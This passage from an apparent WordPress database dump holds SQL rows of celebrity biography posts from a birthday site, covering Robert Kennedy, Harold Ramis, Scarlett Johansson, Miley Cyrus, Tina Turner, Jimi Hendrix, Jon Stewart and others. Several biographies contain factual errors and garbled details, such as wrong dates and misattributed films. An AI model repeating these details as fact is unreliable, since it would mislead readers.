JFK, administration. He served later as the U.S. Senator. During his time that he was running for presidency he was assassinated too.\r\n<h3>In the Beginning</h3>\r\nRobert Kennedy was born on November 20, 1925 in <a href=\"http://www.brooklinema.gov/\" target=\"_blank\">Brookline, Massachusetts</a>. His parents were Rose and Joseph. His father was a rich businessman, while his mother was the daughter of the mayor of Boston at the time. His parents were Roman Catholics and he was raised as such. Him and his seven other siblings enjoyed a comfortable life of privilege and wealth. One of his brothers was the future President of the U.S. John F. Kennedy.\r\n\r\nWhen his father, Joseph, became the U.S. Ambassador to Britain the entire family packed up to move to England. Just like in America, the family was regarded as powerful, handsome, and charismatic. They returned to the US in 1939 when World War II was on the horizon.\r\n\r\nIn Massachusetts, he graduated from the Milton Academy prep school before he enrolled in Harvard. He eventually left when his older brother, Joseph, was killed during the course of World War II. Robert than left Harvard to enlist in the Navy. He returned to Harvard in 1946 and spent three years going for a law degree at the <a href=\"http://www.law.virginia.edu/html/index.htm\" target=\"_blank\">University of Virginia Law School</a>. While he was going for the degree he met Ethel Skakel. In 1951, he graduated law school and was able to pass the bar exam for Massachusetts.\r\n<h3>Career Accomplishments</h3>\r\nRight after law school, he joined up with the U.S. Department of Justice\'s Criminal Division in 1951. He resigned from the position in 1952 in order to help lead the campaign for his older brother John. In 1953, he ended up becoming the advisor for the Senate Subcommitee on Investigations that was working under Senator Joseph McCarthy at the time. Robert left the position six months later when he objected to the unjust investigative tactics McCarthy was using.\r\n<h3>Most Known For</h3>\r\nRobert Kennedy is well known in history for being the appointed <a href=\"http://www.justice.gov/ag/about-office\" target=\"_blank\">Attorney General of the United States</a> in 1960. As the Attorney General, he fought against organized crime and was one of the key supporters of the Civil Rights movement. He was elected to the US Senate in order to represent the state of New York. He was assassinated during the California Democratic presidential primary on June 5, 1968.\r\n<h3>Current Personal Life</h3>\r\nRobert Kennedy was nominated in 1968 to run against <a href=\"https://en.wikipedia.org/wiki/Eugene_McCarthy\" target=\"_blank\">Eugene McCarthy</a> during the presidential elections. He gave a victory speech at the California Democratic Primary at the Ambassador Hotel in Los Angeles. Right after his speech, he was shot multiple times by the gunman named Sirhan Sirhan. He died from his injuries at the age of 42 years old. After his passing, the last of his eleven children were born.\r\n<h3>Where Are They Now</h3>\r\nIt was unfortunate for Robert Kennedy to be <a href=\"http://www.history.com/this-day-in-history/bobby-kennedy-is-assassinated\" target=\"_blank\">assassinated</a> on June 5, 1968. Just a few years earlier his brother, John F. Kennedy, was assassinated on November 22, 1963. It was a sad demise for such upstanding people. Robert Kennedy\'s chance to begin was looked like a promising presidential administration ended before he ever had the chance to begin. The fact it was two brothers, one who became president and another who was running for president, is surprising to say the least.\r\n\r\nWhile Robert Kennedy may no longer be with us today. He left behind a varied political career. He supported the civil rights movement, backed up his brother when he needed his support, and is still remembered even to this day.\r\n\r\n<strong> </strong>','Robert Kennedy (1925 – 1968)','','publish','open','open','','robert-kennedy','','','2016-11-28 16:16:11','2016-11-28 16:16:11','',0,'http://birthdaypedia.com/?p=553',0,'post','',0),(556,2,'2015-11-20 20:55:35','2015-11-20 20:55:35','','Jeff Goldblum birthday','','inherit','open','closed','','jeff-goldblum-birthday','','','2015-11-20 20:55:42','2015-11-20 20:55:42','',449,'http://birthdaypedia.com/wp-content/uploads/2015/10/Jeff-Goldblum-birthday.jpg',0,'attachment','image/jpeg',0),(558,2,'2016-11-21 09:32:59','2016-11-21 09:32:59','Harold Ramis starred in several well known comedies in the 1970s and \'80s. He created several more comedies in his lifetime as well include <em>Knocked Up</em>, <em>Caddyshack</em>, <em>Groundhog Day</em>, and <em>Ghostbusters</em>.\r\n<h3>In the Beginning</h3>\r\nHarold Ramis was born on November 21, 1944 in <a href=\"http://www.cityofchicago.org/city/en.html\" target=\"_blank\">Chicago, Illinois</a>. He held a strong admiration for comedians like Steve Allen, the Marx Brothers, Ernie Kovacs, and Sid Caesar. He was a good student and was even selected for the National Merit Scholar while he was still attending high school.\r\n\r\nHe graduated from the Washington University in St. Louis, Missouri in 1967. He earned a degree in English literature. He held a few jobs before and was even a substitute teacher at one point. He finally landed a job as the jokes editor for <em>Playboy</em> magazine. He worked his way to an associate editor position for the publication. Harold left the position to join a comedy troupe in 1969 residing in Second City.\r\n\r\nIt was in Second City Harold Ramis began to show his true calling for his career. He became well known for his quick ad-libs and his rapier intellect. By the time the 1970s had hit, he was already on Second City\'s television show, SCTV. He worked as a performer and writer for them. He even worked with several other talented comics during the course of the show. Including Eugene Levy and even John Candy.\r\n<h3>Career Accomplishments</h3>\r\nHarold got his big break as a writer towards the end of the 1970s when he worked with Dough Kenney and Chris Miller. Together, they co-wrote a screenplay for a college comedy called <em>Animal House</em> in 1978 that became a big hit. He co-wrote another comedy that became popular called <em>Meatballs</em> in 1979 which starred <a href=\"https://en.wikipedia.org/wiki/Bill_Murray\" target=\"_blank\">Bill Murray</a>. He didn\'t make his debut as a director though until 1980 when he directed the film <em>Caddyshack.</em>\r\n<h3>Most Known For</h3>\r\nThere are still a few comedies that are still popular even to this day, and in many cases still referenced. <em><a href=\"http://www.imdb.com/title/tt0087332/\" target=\"_blank\">Ghostbusters</a></em> is a widely popular fun film that many people all ages enjoy. Along with <em>Groundhog Day</em> that is still mentioned from time to time over different forms of media.\r\n<h3>Current Personal Life</h3>\r\nRamis passed away on February 24, 2014 at the age of 69. His wife <a href=\"http://www.ibtimes.com/meet-erica-mann-harold-ramis-wife-mourns-death-successful-ghostbusters-writer-director-actor-1557566\" target=\"_blank\">Erica Mann</a> and their two sons, Daniel and Julian, survive him. Along with his daughter Violet who is from Ramis\' first marriage to the woman Anne Plotkin. Along with two grandchildren who have survived him as well.\r\n<h3>Where Are They Now</h3>\r\nRamis continued to direct, write, and act on several projects throughout his career. Even in his later years he continued to write. He appeared as the father of Seth Rogen\'s character in the film <em>Knocked Up</em> in 2007. Even snagging a small role on the musical spoof called <em>Walk Hard: The Dewey Cox Story</em>. One of the last works he ever did was being the co-writer and director for another comedy called <em>Year One</em> in 2009. He even had a small role to play in the film too.\r\n\r\nHarold Ramis passed away to soon. Yet, over the course of his career he left many wonderful comedies for people to enjoy. Even to this day his film <em>Ghostbuster</em>s is still widely enjoyed by people of all ages. Not to mention the other popular comedies he came out with in his later years. If anything, Harold Ramis has proved he is dedicated to his craft. He did what he loved and continued to produce good work not matter what. He left behind an impressive legacy of comedy that many people today still cannot match.\r\n\r\n ','Harold Ramis (1944 – 2014)','','draft','open','open','','harold-ramis','','','2016-11-28 15:43:42','2016-11-28 15:43:42','',0,'http://birthdaypedia.com/?p=558',0,'post','',0),(559,2,'2016-11-22 11:49:01','2016-11-22 11:49:01','Scarlett Johansson is the widely popular actress who has seen a rise in popularity over the years. She\'s appeared in several popular films including <em>The Avengers</em> film series and spin-off films. Along with other popular films like<em> Lost in Translation</em>, <em>Hitchcock</em>, <em>The Nanny Diaries</em>, and even <em>Vicky Cristina Barcelona</em>.\r\n<h3>In the Beginning</h3>\r\nScarlett was born on November 22, 1984 in <a href=\"https://en.wikipedia.org/wiki/New_York_City\" target=\"_blank\">New York City</a>. She comes from a line of creative artists too. Her grandfather was Danish, and worked as a director and screenwriter. Her mother worked as a producer too. As if that wasn\'t enough to show Scarlett had it in her blood to pursue an acting career. She even took an interest in the art of acting from an early age too.\r\n\r\nWhen Scarlett was only either years old. She made her first appearance as an actor on the off Broadway product called <em>Sophistry</em>. After the production she continued to seek out other roles to play. Eventually even going to study at Manhattan\'s <a href=\"https://en.wikipedia.org/wiki/Professional_Children%27s_School\" target=\"_blank\">Professional Children\'s School</a> (PCS). It\'s a private educational institutions that\'s well known for producing famous actors like Sarah Michelle Gellar, Carrie Fisher, and Rita Moreno. One her passions early one was musical theater, and she pursued it while attending PCS.\r\n\r\nWhile she was still in school she continued to pursue acting roles. She got her first film debut in 1994 with the film <em>North</em>. She got her first leading role in the film <em>Manny & Lo</em>. She didn\'t receive real critical attention though until she appeared in the film <em>The Horse Whisperer</em> in 1998. As she continued to build up her acting career. She eventually graduated from PCS in 2002.\r\n<h3>Career Accomplishments</h3>\r\nScarlett has won critical acclaim ever since she was thirteen years old. A couple of her successes include <em>Lost in Translation</em>, <em><a href=\"http://www.rogerebert.com/reviews/vicky-cristina-barcelona-2008\" target=\"_blank\">Vicky Cristina Barcelona</a></em>, <em>Hitchcock</em>, and even <em>Girl with a Pearl Earring</em>. She was even nominated for four Golden Globes due to her amazing acting talent.\r\n<h3>Most Known For</h3>\r\nScarlett Johansson is well known for some of her most recent work. Specifically, for her portrayal of the character “Natasha Romanoff” better known as the “Black Widow” from <em>The Avengers</em> movie franchise. She appeared in <em>Captain America: The Winter Soldier</em>, <em>The Avengers</em>, and <em>The Avengers: Age of Ultron</em> in 2015. During the filming of the latest Avenger movie, she was also pregnant.\r\n<h3>Current Personal Life</h3>\r\nScarlett married Ryan Reynolds in September of 2008. They had a small marriage ceremony in British Columbia, Canada. They bought a home in Los Angeles, California. The married did not last for long though since they <a href=\"http://popcrush.com/scarlett-johansson-reason-behind-ryan-reynolds-divorce/\" target=\"_blank\">divorced</a> in December 2010. After the breakup, Scarlett began a relationship with <a href=\"http://birthdaypedia.com/sean-penn/\">Sean Penn</a>. They traveled to Mexico and even attended a wedding for another actress.\r\n\r\nScarlett did find herself as the focus of a scandal for a while when there were nude photos posted online of her that were taken by hackers. The FBI started an investigation into the people behind the leak who were also targeting other young stars at the time.\r\n\r\nIn 2013, she became engaged with Romain Dauriac. The couple had been dating since 2012. They had their baby daughter, Rose, on September 4, 2014. They married on October 1, 2014 in Phillipsburg, Montanta.\r\n<h3>Where Are They Now</h3>\r\nScarlett has continued to be an amazing actor. After <em>The Avengers</em> movie franchise has been a box office hit. Many fans have come to associate her with her portrayal of Black Widow. There are future <em>Avengers</em> movies set to come to the big screen, and if it turns out well. Scarlett could be coming back as the Black Widow for a fourth time.\r\n\r\n \r\n\r\n ','Scarlett Johansson (1984 – Present)','','draft','open','open','','scarlett-johansson-1984-present','','','2016-11-28 15:41:35','2016-11-28 15:41:35','',0,'http://birthdaypedia.com/?p=559',0,'post','',0),(560,2,'2016-11-28 15:35:13','0000-00-00 00:00:00','Miley Cyrus is an singer and actress who is the daughter of the famous country singer Billy Ray Cyrus. From an early age Miley seemed destined for fame. Ever since she became the star of Disney\'s hit show “<a href=\"http://www.imdb.com/title/tt0493093/reviews\" target=\"_blank\">Hannah Montana</a>” series. She\'s gone on to be a big success in the music industry.\r\n<h3>In the Beginning</h3>\r\nMiley Cyrus was born on November 23, 1992 in <a href=\"http://www.franklintn.gov/\" target=\"_blank\">Franklin, Tennessee</a>. Her father is Billy Ray Cyrus who is a famous country singer. She grew up on the family farm close to Nashville, Tennessee along her two siblings and three half siblings. Miley had an interest in acting from a young age. Even appearing on the <em>Doc</em> television series and even the film <em>Big Fish</em> in 2003.\r\n\r\nIn 2004, Miley was picked out of 1,000 other contestants for the lead role in the new Disney show called <em>Hannah Montana</em>. The series is about a tween who has to hide her celebrity identity so she\'s able to lead a normal teen life.\r\n\r\nIn order to make filming easier. The family moved from their home to Los Angeles, California. Miley\'s father, Billy Ray, even joined her on the show as the fictional dad manager for the character. Her fame began to rise due to the show, and Miley even released a soundtrack called <em>Hannah Montana</em> in 2006.\r\n\r\nIn 2007, a tour was launched called “Best of Both Worlds”. The series of concerts for the tour sold out. The show itself going to 14 days to help please disappointed fans. Her 3D concert film even earned an impressive $31.3 million during its first opening weekend in February of 2008.\r\n<h3>Career Accomplishments</h3>\r\nMiley Cyrus has set the stage for her career at an early age. She first got her big debut on the hit show <em>Hannah Montana</em> in 2004. Even going on to release a couple of successful albums like <em>Breakout</em> in 2008 and <em>Can\'t Be Tamed</em> in 2010. In 2013, she released a single called “<a href=\"http://www.foxnews.com/entertainment/2013/09/10/miley-cyrus-sex-crazed-wrecking-ball-video-shatters-records-earns-lots/\" target=\"_blank\">Wrecking Ball</a>” which had a controversial video. The single became her first No. 1 hit in the U.S.\r\n<h3>Most Known For</h3>\r\nMiley Cyrus is still young, and her career is not as varied compared to other celebrities. Many people still recognize Miley Cyrus for the leading role she played on the Disney hit series <em>Hannah Montana</em>. Her single, “Wrecking Ball” in 2013, has caught her at the center of media attention in recent years too.\r\n<h3>Current Personal Life</h3>\r\nMiley Cyrus has made more than a couple of headlines due to her <a href=\"http://www.whosdatedwho.com/dating/miley-cyrus\" target=\"_blank\">romantic life</a>. She dated Nick Jonas for a while in 2007. Over time she was involved romantically Carter Jenkins and Justin Gaston. Along with a couple of other celebrities. Miley announced her engagement to Liam Hemsworth in June of 2012. The two were not meant to be together it seemed when the couple called it off on Sepetember 2013 after being together for four years.\r\n<h3>Where Are They Now</h3>\r\nMiley has begun to distance herself from her <em>Hannah Montana </em>days. Going so far as to have her hair cut short and even wearing odd fashions to give herself a new identity. During the MTV Video Music Awards in August of 2013. Miley put on a strange performance for her single “We Can\'t Stop”. During the time she even appeared nude on her new follow-up single at the time called “Wrecking Ball.” There was a lot of controversy about it, but her studio album, <em><a href=\"http://www.rollingstone.com/music/albumreviews/bangerz-20131004\" target=\"_blank\">Bangerz</a></em>, had good sales. She was even able to earn Video of the Year Honors at the 2014 VMAs.\r\n\r\nQuite recently, Miley has begun to dip her toes in the acting business. Even appearing in a couple of holiday comedies like <em>The Night Before</em> and <em>A Very Murray Christmas</em>.\r\n\r\n ','Miley Cyrus (1992 – Present)','','draft','open','open','','miley-cyrus','','','2016-11-28 15:35:13','2016-11-28 15:35:13','',0,'http://birthdaypedia.com/?p=560',0,'post','',0),(561,2,'2015-11-23 21:57:31','2015-11-23 21:57:31','','johnny carson birthday','','inherit','open','closed','','johnny-carson-birthday-2','','','2015-11-23 21:58:32','2015-11-23 21:58:32','',450,'http://birthdaypedia.com/wp-content/uploads/2015/10/johnny-carson-birthday.jpg',0,'attachment','image/jpeg',0),(563,2,'2015-11-23 22:30:55','2015-11-23 22:30:55','','drake birthday','','inherit','open','closed','','drake-birthday','','','2015-11-23 22:31:00','2015-11-23 22:31:00','',451,'http://birthdaypedia.com/wp-content/uploads/2015/10/drake-birthday.jpg',0,'attachment','image/jpeg',0),(564,2,'2015-11-24 07:25:43','2015-11-24 07:25:43','Sarah Hyland is a widely popular TV actress. She was even nominated for Critics\' Choice Television Award for Best Comedy Supporting Actress in 2013. She did an excellent portrayal for her character role, Haley Dunphy, on the hit TV series <a href=\"https://en.wikipedia.org/wiki/Modern_Family\" target=\"_blank\">Modern Family</a>.\r\n<h3>In the Beginning</h3>\r\nSarah Hyland was born on November 24, 1990 in <a href=\"http://www1.nyc.gov/\" target=\"_blank\">New York City</a>. Her parents were Edward James Hyland and Melissa D. Canaday. Right from the start, Sarah was involved in the acting business. When she was only four years old she was already doing voice overs and commercial work. She even starred in first film, called <em>Private Parts</em>, in 1997. The next project she became involved was <em>The Object of My Affection</em> in 1998. She then went on to work on several other film and TV projects as well.\r\n\r\nAlongside all the television and film work she was doing. Sarah studied Theatre Dance, voice, tap, ballet, hip-hop, and even jazz. She even performed at the “Reel to Real” at <a href=\"http://www.lincolncenter.org/\" target=\"_blank\">Lincoln Center</a> with her tap dance class.\r\n\r\nSarah was raised in New York throughout her childhood. She spent a lot of her time traveling with her father, working in film, voicing radio ads, and even work in television. Her mother home schooled her until Sarah reached the 2<sup>nd</sup> grade. Where at that point she attended Public School. When she reached 6<sup>th</sup> grade she was able to get accepted into the PPAS (<a href=\"http://www.edline.net/pages/ppas\" target=\"_blank\">Professional Performing Arts School</a>) where she attended until she graduated in 2008.\r\n\r\nWhen Sarah was eighteen years old she moved into Los Angeles, California. She was able to land on a pilot called “My American Family”. When it was picked it up the name of the show was changed to <em>Modern Family</em> in 2009.\r\n<h3>Career Accomplishments</h3>\r\nEver since Sarah has started her acting career. She\'s had quite a bit of good luck. The show she stars in, <em>Modern Family</em>, even won an Emmy for Outstanding Comedy Series. She is has become a familiar face on television. Along with do many stage productions including “Bad Girls”, “Dark Part of the Forest” and even “Grey Gardens” too.\r\n<h3>Most Known For</h3>\r\nSarah is still highly recognized for her role “Haely Dunphy” on the show <em>Modern Family</em>. The show is still on the air today and is still widely popular. Sarah has still continued to do her television work and has had a couple of guest appearances on the show <em>Law & Order</em>.\r\n<h3>Current Personal Life</h3>\r\nSarah currently lives in Los Angeles, California. She has a Maltipoo she has named Barkley and loves. In 2009, she was in a romantic relationship with <a href=\"http://hollywoodlife.com/2014/09/24/matthew-prokop-sarah-hyland-breakup-details-restraining-order/\" target=\"_blank\">Matt Prokop</a> until they broke up in 2014. She also confessed to Seventeen Magazine she had to undergo a kidney transplant in April of 2012. She had been battling kidney dysplasia since she was nine years old. Her father was the one who donated a kidney to her.\r\n\r\nSarah even had a temporary restraining order against her now ex-boyfriend Matt Prokop on September 19, 2014.\r\n<h3>Where Are They Now</h3>\r\nSarah Hyland is still acting on<em> Modern Family</em>. Despite a few recent setbacks in her romantic life and health. She is still pushing forward in her career. Sarah has an extensive resume from the work she\'s done in acting. At the moment, it seems as if she\'ll be ready to become a big name star in the show industry. It\'s safe to say she may even be able to score a key role in a movie at some point. Sarah Hyland is sure to shine in the next couple of years and become a household name.\r\n\r\n ','Sarah Hyland (1990 – Present)','','draft','open','open','','sarah-hyland','','','2015-11-24 12:41:30','2015-11-24 12:41:30','',0,'http://birthdaypedia.com/?p=564',0,'post','',0),(566,2,'2015-11-25 07:06:16','2015-11-25 07:06:16','Joe DiMaggio is a legend in the game of baseball. He had an impressive 56 gaming hitting streak he was able to hold in 1941. On top of winning nine World Series titles over the course of his career with the <a href=\"http://www.baseball-reference.com/players/d/dimagjo01.shtml\" target=\"_blank\">New York Yankees</a>.\r\n<h3>In the Beginning</h3>\r\nJoe was born on November 25, 1914 in <a href=\"http://www.cityofmartinez.org/\" target=\"_blank\">Martinez, California</a>. He was the eighth child to be born to Rosalie and Giuseppe DiMaggio. His parents were originally Italian immigrants who were residing in Sicily before they moved to California in 1898. His family moved to North Beach a year before Joe was born.\r\n\r\nJoe\'s father worked as a fisherman, and hope his sons would join him in the trade. Joe had no interest in fishing. Growing up as the son of a poor immigrant, he formed an image of the “American Dream”. Rather than follow his father to the fishing boat. Joe too an interest in heading to the sandlot baseball fields with his older brother Vince. Joe quickly became a legend on the playground due to his talent.\r\n\r\nHe enrolled in Galileo High School, but dropped out when he was sixteen to pursue baseball instead. He played the game daily at the dairy wagon parking lot. Soon, he was laying for a local league that was being sponsored at the time by the olive oil distributor known as Rossi. He got two baseballs out of the deal and $16 worth of merchandise once he was able to lead his team all the way to the league champion ship.\r\n\r\nHis older brother, Vince, signed up with the <a href=\"https://en.wikipedia.org/wiki/San_Francisco_Seals_(baseball)\" target=\"_blank\">San Francisco Seal </a>in 1932. The shortstop in the club was injured in the middle of the season, and Vince suggest that Joe be the replacement. Joe played the last couple of games for the 1932 season. Afterwards, he found himself with a full place with the Seals in 1933.\r\n<h3>Career Accomplishments</h3>\r\nJoe was able to help the New York Yankees to win nine World Series titles. Earning him widespread fame when he also held a record for a 56 game hitting streak he got in 1941. Joe even holds a place in the Hall of Fame after being elected to it in 1955.\r\n<h3>Most Known For</h3>\r\nJoe DiMaggio is known first and foremost for his stint on the New York Yankees. He helped them to win nine World Series titles. Along with his impressive 56 game hitting streak that he became famous for. He even married <a href=\"https://en.wikipedia.org/wiki/Marilyn_Monroe\" target=\"_blank\">Marilyn Monroe</a> for a time. In 1955, he was elected to the Hall of Fame for his athletic talent in baseball.<strong> </strong>\r\n<h3>Current Personal Life</h3>\r\nJoe married a woman named Dorothy Arnold in 1939. They did have a son, whom they named Joe III. The couple divorced though after being married for five years. Joe retired from baseball in 1952, and fell in love with the famous actress Marilyn Monroe. It was a high profile romance at the time that saw a courtship between the two lasting for eighteen months. The two married on January 14, 1954. The press called it “the Marriage of the Century.”\r\n\r\nTheir marriage was not set to be a successful one though. Joe leaned more towards settling down while Monroe\'s career was starting to pick up off the ground. Their union ended less than a year later. The two remained close friends until Monroe died in 1962. For the next 20 years he had roses delivered to Monroe\'s grave three times week. He never married anyone else.\r\n<h3>Where Are They Now</h3>\r\nJoe DiMaggio, despite the tragedy in his personal life, had a peaceful retirement. He was a public figure and appeared as a television and radio spokesman for an assortment of products. He suffered from complications with <a href=\"http://www.people.com/people/article/0,,614867,00.html\" target=\"_blank\">lung cancer</a>. Passing away on March 8, 1999 when he was 84 years old.\r\n\r\n ','Joe DiMaggio (1914 – 1999)','','draft','open','open','','','','','2015-11-25 12:53:31','2015-11-25 12:53:31','',0,'http://birthdaypedia.com/?p=566',0,'post','',0),(567,2,'2016-11-26 08:10:38','2016-11-26 08:10:38','Tina Turner is a singer and actress who came to fame in the 1960s. She performed and sang with her husband at the time, Ike Turner. Later on she pursued a solo career and saw a lot of success for her efforts.\r\n<h3>In the Beginning</h3>\r\nTina was born on November 26, 1939 in <a href=\"https://en.wikipedia.org/wiki/Nutbush,_Tennessee\" target=\"_blank\">Nutbush, Tennessee</a>. Her parents were Zelma and Floyd Bullock who worked as poor sharecroppers. Early in Tina\'s life her parents split up. Leaving Tina and her sister to be brought up by their grandmother. Her grandmother passed away in the 1950s. Tina than moved to St. Louis, Missouri to live with her mother.\r\n\r\nTina was barely in her teens when she became devoted to the <a href=\"http://www.soulmusicsanctuary.net/soul-musics-history.html\" target=\"_blank\">R&B</a> scene in St. Louis. She spent a lot of her time at the Club Manhattan. In 1956, she met Ike Turner who was a rock and roll legend at the time. Ike often played with the Kings of Rhythm at the club. Tina was soon performing with the group, and soon stole the show with her talent.\r\n\r\nIn 1960, Tina got her chance to shine. The singer for the Kings of Rhythm didn\'t show up for the recording session. So, Tina sang the lead track called “A Fool in Love”. The record was then sent off to a radio station located in New York. It was released as “Ike and Tina Turner.” The song soon became a huge success, and even made its way into the pop charts too.\r\n<h3>Career Accomplishments</h3>\r\nIn the 1950s, Tina and her husband became known as the Tina Turner Revue. She shot to fame for her recordings and performances. When she began to pursue her solo career it was slow, but she saw success in her 1984 album <em><a href=\"http://www.rollingstone.com/music/albumreviews/private-dancer-19840705\" target=\"_blank\">Private Dancer</a></em>.\r\n<h3>Most Known For</h3>\r\nTina Turner is considered a rock and roll legend. She was always able to deliver chart topping albums on a pretty much regular basis. Her fame and talent soon had her elected to the Hall of Fame in 1991. Later on she became involved with a very spiritual project called <em>Beyond</em>.\r\n<h3>Current Personal Life</h3>\r\nTina Turner still loves her work, and despite her age has even found love too. She married Erwic Bach in 2013. Who had been a longtime partner of hers and worked as a German record executive. It was in July of 2013 they two got married in Zurich, Switzerland a few months after Tina had received her Swiss citizenship.\r\n<h3>Where Are They Now</h3>\r\nTina has never stopped doing what she loves. In 1996, she released <em>Wildest Dreams</em> and in 1999 released <em>Twenty Four Seven</em>. She even made a couple of recordings for film soundtracks. Including <em>He Lives in You</em> and <em>Goldeneye</em>. In 1991, she Tina and Ike Turner were elected into the <a href=\"http://www.rockhall.com/\" target=\"_blank\">Rock and Roll Hall of Fame</a>. Ike could not attend the ceremony due to serving time for drug possession. He passed away from an overdose in 2007.\r\n\r\nTo celebrate her successful career, in 2008 she went on her “Tina! 50<sup>th</sup> Anniversary Tour”. The tour soon became one of few of the highest selling ticketed shows in 2008 and 2009. Unfortunately, she announced it was going to be her last tour. She was going to be retiring from the music business, except for a few recordings and appearances. She did get involved with a project that involved chants and spiritual prayers by singers Dechan Shak-Dagsay and Regula Curti. She joined up with them for <em>Beyond</em> that was released in 2010. Along with a few follow up albums upon its release with <em>Children Beyond</em> in 2011 and <em>Love Within</em> released in 2014.\r\n\r\n \r\n\r\n ','Tina Turner (1939 – Present)','','publish','open','open','','tina-turner','','','2016-11-28 15:16:05','2016-11-28 15:16:05','',0,'http://birthdaypedia.com/?p=567',0,'post','',0),(568,2,'2016-11-27 09:10:40','2016-11-27 09:10:40','Jimi Hendrix is a popular singer, songwriter, and guitarist. In the 1960s he was a huge hit and many people enjoyed listening to his experimental music.\r\n<h3>In the Beginning</h3>\r\nJimi was born on November 27, 1942 in <a href=\"http://www.seattle.gov/visiting-seattle\" target=\"_blank\">Seattle, Washington</a>. As a teenager he learned to play guitar. His childhood was difficult since at times he lived with different acquaintances and relatives. Even for his age though, he wanted to grow up to be a rock star legend.\r\n\r\nHis mother was named Lucille, and she was only seventeen when she had Hendrix. She had a rocky relationship with Jimmy\'s father, Al. She left the family after the birth of two more children. Jimi\'s younger brothers, Joseph and Leon. He would only see his mother from time to time until she passed away in 1958.\r\n\r\nJimi found a sanctuary in music. He was a big fan of the blues, and when he was fourteen he saw <a href=\"https://en.wikipedia.org/wiki/Elvis_Presley\" target=\"_blank\">Elvis Presley</a> perform. The following year Jimi acquired his first electric guitar. He played with two bands, the Tomcats and Rocking Kings. He dropped out of high school in 1959. He continued to pursue music and worked odd jobs to support himself.\r\n\r\nIn 1961, he signed up with the United States Army and trained at Fort Ord in California. He became a paratrooper, and even though he was a soldier. He was still able to find time to pursue his passion. He created his own band called <a href=\"http://www.indiana45s.com/kingcasuals.htm\" target=\"_blank\">The King Casuals</a>. He served until 1962 and had to be discharged because of an injury.\r\n\r\nOnce he was out of the military, Jimi continued to pursue music. He worked playing backup for performers like Little Richard. He formed another group of his own called Jimmy James and the Blue Flames. They played gigs all over New York City\'s Greenwich Village Neighborhood.\r\n<h3>Career Accomplishments</h3>\r\nJimi got his big break in 1966 when he met <a href=\"http://ultimateclassicrock.com/chas-chandler-leaves-jimi-hendrix/\" target=\"_blank\">Chas Chandler</a>. Chandler became Jimi\'s manager and convinced Jimi to join up with the other musicians Mitch Mitchell and Noel Redding. Together, they created The Jimi Hendrix Experience. Jimi began to build up a reputation among the England\'s rock royalty. In 1967, the band released its first single “Hey Joe”. It was a hit right off the bat and they had other hits like “Purple Haze” and “The Wind Cried Mary”. The went on tour to support their first album, <em>Are You Experienced?</em>, and audiences loved his guitar playing skill. He gave an amazing performance at the Monterey Pop Festival in June of 1968. The performance ended when Jimi lit his guitar on fire.\r\n<h3>Most Known For</h3>\r\nJimi is well known for his experimental guitar playing. His skill on the electric guitar was legendary, and one of his best performances was at Woodstock in 1969. He performed “The Star Spangled Banner” in front of thousands of people. Helping to leave his mark on the rock music industry.\r\n<h3>Current Personal Life</h3>\r\nUnfortunately, despite his talent and fame. Jimi did not remain on the rock scene for very long. He died on September 18, 1970 due to drug related complications. He was only 27 years old when he passed away.\r\n<h3>Where Are They Now</h3>\r\nDespite his age, Jimi Hendrix left his mark on the music industry. His music is still popular and is still widely listened to today. His skill for electric guitar and experimental sound is legendary. Members of the Beatles even enjoyed Jimi Hendrix\'s music as well. Even though his stardom and music only lasted for a few years. It\'s still well remembered. Even a journalist wrote for the Berkeley Tribe stating:\r\n\r\n<em> “Jimi Hendrix could get more out of an electric guitar than anyone else. He was the ultimate guitar player.\"</em>\r\n\r\n \r\n\r\n ','Jimi Hendrix (1942 – 1970)','','publish','open','open','','jimi-hendrix','','','2016-11-28 15:17:19','2016-11-28 15:17:19','',0,'http://birthdaypedia.com/?p=568',0,'post','',0),(569,2,'2015-11-28 08:06:59','2015-11-28 08:06:59',' \r\n\r\nJon Stewart is a popular award winning comedian. He\'s a writer, talk show host, comedian, and director. He\'s well known for his time of being the host of Comedy Central\'s “The Daily Show with Jon Stewart”.\r\n<h3>In the Beginning</h3>\r\nJon was born on November 28, 1962 in New York City. His family moved to <a href=\"http://www.lawrencetwp.com/\" target=\"_blank\">Lawrenceville, New Jersey</a>. He spent the majority of his youth growing up there. He graduated from College of William and Mariy in 1984 in Williamsburg, Virginia. He played soccer team and studied psychology. He continually moved in between jobs before he moved to New York City in 1986 where he made a break in the comedy club circuit. He started hosting Comedy Central\'s <em><a href=\"https://en.wikipedia.org/wiki/Short_Attention_Span_Theater\" target=\"_blank\">Short Attention Span Theater</a></em> three years later. In 1993, he finally launched the first talk show for MTV called T<em>he Jon Stewart Show</em>.\r\n\r\nIn the 1990s, he popped up on several television programs. He had a regular role on HBO\'s <em>The Larry Sanders Show</em>. Stewart was also the co-executive producer for the show. He soon became a high regarded critic when it came to established news media and Washington politics.\r\n<h3>Career Accomplishments</h3>\r\nNot only is he a host, but Jon has pursued other endeavors as well. He kicked off his film career with Half Baked in 1998. Death to Bomb in 2002 bombed at the box office. He came out with another film, <em>Big Daddy</em> in 1999. He even scored a few roles in the horror comedy <em>The Faculty</em> which was released in 1998. He even did a bit of voice acting in a couple of animated films, including <em>Doogal</em> in 2006.\r\n\r\nJon has even hosted a couple of award shows, including the Grammys in 2001 and 2002. He also hosted the Academy Awards in 2006 and 2008.\r\n<h3>Most Known For</h3>\r\nJon Stewart is well know for the first talk show ever launched on MTV called <em><a href=\"https://en.wikipedia.org/wiki/The_Jon_Stewart_Show\" target=\"_blank\">The Jon Stewart Show</a></em>. He was known to appear on a number of different TV programs. Including being the anchorman of <em>The Daily Show</em>, which was later renamed <em>The Daily Show with Jon Stewart</em>. Sadly, he announced he was leaving the show in 2015.\r\n<h3>Current Personal Life</h3>\r\nStewart married a woman named <a href=\"http://heavy.com/entertainment/2015/08/tracey-mcshane-jon-stewarts-wife-net-worth-kids-daughter-son-family/\" target=\"_blank\">Tracey McShane</a> in 2000. They had a son and daughter together named Nathan Thomas and Maggie Rose.\r\n<h3>Where Are They Now</h3>\r\nIn February of 2015, Jon made the announcement he was going to be leaving <em>The Daily Show</em> later that year. He signed off on his last episode for the show on August 6, 2015. His news teams celebrated with him along with a few famous political targets too for a heartfelt farewell to Jon.\r\n\r\nHis program won an Emmy a few weeks later for Outstanding Variety Talk Series. Jon then talked about his life after being on the show for so long. In November of 2015, he was already taking the new steps for the next phase of his already successful carer. He announced that he had signed a four year deal to create <a href=\"http://www.hollywoodreporter.com/live-feed/jon-stewart-headed-hbo-four-836443\" target=\"_blank\">digital content for HBO\'s platforms</a>.\r\n\r\nJon Stewart\'s career has been a largely successful one for him. He\'s already made a splash in the media for being one of 